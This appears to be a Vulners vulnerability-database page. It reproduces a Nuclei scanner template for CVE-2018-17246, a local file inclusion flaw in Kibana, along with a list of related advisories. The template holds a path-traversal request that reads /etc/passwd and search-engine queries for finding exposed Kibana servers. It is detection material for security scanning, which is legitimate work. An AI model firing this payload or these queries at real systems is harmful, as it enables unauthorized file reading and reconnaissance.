Vulners
Lucene search
Kibana - Local File Inclusion
| Reporter | Title | Published | Views | Family All 35 |
|---|---|---|---|---|
 | Exploit for Code Injection in Pivotal_Software Spring_Data_Commons | 11 Apr 202111:34 | – | gitee |
 | CVE-2018-17246 | 12 Nov 202400:00 | – | circl |
 | Elasticsearch Kibana Console Plugin Command Execution Vulnerability | 13 Nov 201800:00 | – | cnvd |
 | CVE-2018-17246 | 20 Dec 201822:00 | – | cve |
 | CVE-2018-17246 | 20 Dec 201822:00 | – | cvelist |
 | Elastic Stack 6.4.3 and 5.6.13 security update | 6 Nov 201818:35 | – | elastic |
 | Kibana ESA-2018-18 | 7 Nov 201800:00 | – | nessus |
| Photon OS 1.0: Kibana PHSA-2019-1.0-0209 | 28 Jan 202000:00 | – | nessus |
| Photon OS 2.0: Kibana PHSA-2019-2.0-0132 | 18 Mar 201900:00 | – | nessus |
| Photon OS 3.0: Kibana PHSA-2019-3.0-0002 | 22 Jul 202400:00 | – | nessus |
10
id: CVE-2018-17246
info:
name: Kibana - Local File Inclusion
author: princechaddha,thelicato
severity: critical
description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
impact: |
Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further attacks.
remediation: |
Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.
reference:
- https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md
- https://www.elastic.co/community/security
- https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594
- https://nvd.nist.gov/vuln/detail/CVE-2018-17246
- https://access.redhat.com/errata/RHBA-2018:3743
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-17246
cwe-id: CWE-829,CWE-73
epss-score: 0.82251
epss-percentile: 0.99614
cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: elastic
product: kibana
shodan-query: http.title:"kibana"
fofa-query: title="kibana"
google-query: intitle:"kibana"
tags: cve,cve2018,lfi,kibana,vulhub,elastic,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"message\":\"An internal server error occurred\""
- type: word
part: header
words:
- "kbn-name"
- "kibana"
case-insensitive: true
condition: or
- type: word
part: header
words:
- "application/json"
# digest: 4a0a00473045022100baeb341e2ab36648629417ba58e6c56de55b6149f10765b6c685de841992b1fd02202a837ab85e2a1a384cbf00a980b7d471f3ba2983830d58c9b60e0788f87342a7:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 27.5
CVSS 39.8
EPSS0.82251